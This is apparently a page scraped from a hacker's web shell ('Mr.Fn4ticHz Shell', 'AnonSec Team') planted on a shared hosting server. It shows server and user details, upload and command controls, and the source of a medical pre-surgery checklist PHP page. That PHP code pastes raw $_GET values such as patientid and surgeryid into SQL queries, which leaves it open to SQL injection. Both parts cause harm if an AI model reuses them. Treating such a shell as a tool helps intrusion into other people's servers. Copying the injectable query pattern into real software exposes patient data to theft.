Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.15.139.79
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//show_Before_Conduction.php
     <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		  
}
?>
	  

  <?php


?>



<h3 align='center'>Before Conducting Procedure</h3>
<?php

?>  
   <div class='center'>
      <?php
  	$sql ="SELECT * FROM Before_Conduction WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo"
		    <h3 align='right'><a href='edit_Before_Conduction.php?prescriptionid=$rs[prescriptionid]&patientid=$rs[patientid]&surgeryid=$rs[surgeryid]'><i class='fa fa-pencil-square-o'></i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a></h3>";
		}
		?>



                  <p>
               <table id="example2" class="table table-bordered table-hover"> 
                  	<?php
$sql ="SELECT * FROM Before_Conduction WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]' AND  surgeryid='$_GET[surgeryid]'";
$qsql = mysqli_query($con,$sql);
while($rs = mysqli_fetch_array($qsql))
{
if($rs[Anesthesia_Safety]=='on')
{
    echo"
     <tr><td width='50%'>Anesthesia Safety Check Completed  </td>
    <td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>
    ";
}
else{
     echo"
     <tr><td width='50%'>Anesthesia Safety Check Completed  </td>
    <td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>
    "; 
}
if($rs[Pulse_Oximeter]=='on')
{
    echo"
     <tr><td width='50%'>Pulse Oximeter On And Functioning </td>
    <td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>
    ";
}
else{
     echo"
     <tr><td width='50%'>Pulse Oximeter On And Functioning </td>
    <td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>
    "; 
}
if($rs[Known_Allergy]=='on')
{
    echo"
     <tr><td width='50%'>Does Patient Have A Known Allergy </td>
    <td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>
    ";
}
else{
     echo"
     <tr><td width='50%'>Does Patient Have A Known Allergy </td>
    <td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>
    "; 
}
if($rs[Difficult_Airways]=='on')
{
    echo"
     <tr><td width='50%'>Difficult Airways/Aspiration Risk  </td>
    <td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>
    ";
}
else{
     echo"
     <tr><td width='50%'>Difficult Airways/Aspiration Risk  </td>
    <td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>
    "; 
}

if($rs[Risk_500]=='on')
{
    echo"
     <tr><td width='50%'>Risk of> 500 Ml Blood Loss (7ml/Kg In Children)   </td>
    <td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>
    ";
}
else{
     echo"
     <tr><td width='50%'>Risk of> 500 Ml Blood Loss (7ml/Kg In Children)   </td>
    <td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>
    "; 
}

}
?>

</table></div>

Anon7 - 2022
AnonSec Team